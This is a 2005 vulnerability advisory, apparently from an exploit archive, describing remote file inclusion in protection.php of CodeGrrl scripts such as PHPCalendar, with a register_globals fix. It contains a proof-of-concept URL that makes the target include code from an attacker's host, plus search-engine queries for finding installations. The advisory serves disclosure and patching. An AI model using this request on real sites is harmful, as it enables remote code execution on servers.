PHPCalendar.txt

PHPCalendar.txt: Posted Nov 15, 2005; Authored by Robin Verton; A remote code execution vulnerability has been discovered in various CodeGrrl products including PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, and PHPQuotes.; tags | exploit, remote, code execution; SHA-256 | 2539e6a0a10e5c9a163b673cf8ee1861d726956268b445b7b8fd95553d9bb737; Download | Favorite | View

PHPCalendar.txt

PHPCalendar (and some more codegrrl.com products) arbitrary code execution
==========================================================================


   Software: PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, PHPQuotes
   Severity: Arbitrary code execution
   Risk: High
   Author: Robin Verton <r.verton@gmail.com>
   Date: Sep. 24 2005
   Vendor: codegrrl.com [contacted]


   Description:

  Written in PHP/MySQL, PHPCalendar is a script designed especially to help webmasters to mantain a calendar, with all upcoming events and birthdays.
  It was designed to be used at personal sites, but it can also be very useful for fansites, to keep track of tours, premiers, awards shows, 
  tv apearances, interviews, magazines features, and many more! You can see it in use at unfloopy.net.
  [http://www.codegrrl.com/]


   Details:

  1) protection.php (with register_globals = On)
     If register_globals is on an attacker can include an arbitrary php file to execute malicious code.
  


     $logout_page = "$siteurl";

     [...]

     if ($action == "logout")
     {
          Setcookie("logincookie[pwd]","",time() -86400);
          Setcookie("logincookie[user]","",time() - 86400);
          @include($logout_page);
    exit;
     }

   Proof of Concept:

     To exploit this vulnerability an attacker only has to use the following HTTP-Request:
     http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicoius-code.txt

   Patch:
           Set register_globals in the php.ini off or disallow direct access to the protection.php f.e. define constants and use
           code like 

     if( !defined('IN_SYS') ) {
       die('Hacking attempt');
     } 

     to prevent the direct access
  
   Credits:

       Credit goes to Robin Verton, 15 years old from Germany

   References:

       [1] http://codegrrl.com
       [2] http://www.google.com/search?q=%22Powered+by%3A+PHPFanBase%22 [about 112,000 results]
       [3] http://www.google.com/search?q=%22Powered+by%3A+PHPCalendar%22 [about 44,000 results]
       [4] http://www.google.com/search?q=%22Powered+by%3A+PHPCurrently%22 [about 44,000 results]
       [5] http://www.google.com/search?q=%22Powered+by%3A+PHPClique%22 
       [6] http://www.google.com/search?q=%22Powered+by%3A+PHPQuotes%22

Top Authors In Last 30 Days

Red Hat 184 files
Ubuntu 64 files
Debian 22 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Google Security Research 6 files
Apple 6 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,009)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,174)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,460)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,433)
UNIX (9,390)
UnixWare (187)
Windows (6,648)
Other

PHPCalendar.txt

PHPCalendar.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHPCalendar.txt

Share This

PHPCalendar.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems